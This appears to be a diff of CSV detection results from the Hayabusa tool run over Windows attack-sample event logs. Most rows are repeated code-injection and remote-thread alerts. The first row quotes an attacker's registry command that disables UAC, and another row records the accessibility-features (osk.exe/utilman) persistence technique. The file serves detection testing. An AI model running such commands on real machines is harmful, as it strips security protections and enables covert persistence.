+2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry  :  Command: reg  add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f  :  Path: C:\Windows\System32\reg.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: ""C:\Windows\System32\osk.exe""    :  Path: C:\Windows\System32\osk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\osk.exe""  ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
